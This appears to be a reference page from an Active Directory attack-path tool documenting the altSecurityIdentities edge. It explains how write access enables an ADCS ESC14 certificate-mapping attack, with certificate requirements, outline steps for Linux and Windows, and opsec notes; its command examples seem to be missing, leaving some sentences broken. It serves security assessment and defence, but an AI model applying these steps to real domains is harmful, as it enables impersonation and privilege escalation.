altSecurityIdentities attribute stores explicit certificate mappings for a principal. An explicit certificate mapping links a specific certificate to the target as an alternative to the normal certificate-to-account mapping rules, allowing authentication as that principal.
Abuse Info
Write access toaltSecurityIdentities may enable an ADCS ESC14 Scenario A attack.
An attacker can add an explicit certificate mapping on the target that refers to a certificate in the attacker’s possession, then use that certificate to authenticate as the target.
The certificate must meet the following requirements:
- Chain up to a trusted root CA on the domain controller.
- Include an Enhanced Key Usage (EKU) extension that enables domain authentication.
- Not include an Other Name / Principal Name entry (UPN) in the Subject Alternative Name (SAN).
- Client Authentication (
1.3.6.1.5.5.7.3.2) - PKINIT Client Authentication (
1.3.6.1.5.2.3.4) - Smart Card Logon (
1.3.6.1.4.1.311.20.2.2) - Any Purpose (
2.5.29.37.0) - SubCA (no EKUs)
Computer (Machine) meets these requirements and grants Domain Computers enrollment rights. The target can still be a user.
The last requirement does not apply if a domain controller has UPN mapping disabled. See How to disable the Subject Alternative Name for UPN mapping.
The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber or X509SHA1PublicKey. The examples below use X509SHA1PublicKey.
Linux
Obtain a certificate that meets the requirements above, for example by dumping a certificate from a computer or enrolling a new certificate as a computer:mail or dNSHostName attribute set as required by the certificate template. The mail attribute can be set on users and computers, but dNSHostName can only be set on computers. Computers have validated write permission to their own dNSHostName attribute by default, but neither users nor computers can write to their own mail attribute by default.
Get the SHA1 hash of the certificate public key:
Windows
Obtain a certificate that meets the requirements above, for example by dumping a certificate from a computer or enrolling a new certificate as a computer with Certify (2.0):cert.pem and the private key as cert.key, then convert it to a PFX file:
Opsec Considerations
When the affected certificate authority issues the certificate to the attacker, it retains a local copy of that certificate in its issued certificates store. Defenders may analyze issued certificates to identify illegitimately issued certificates and the principal that requested them.Edge Schema
Source: User, Group, ComputerDestination: User, Computer
Traversable: Yes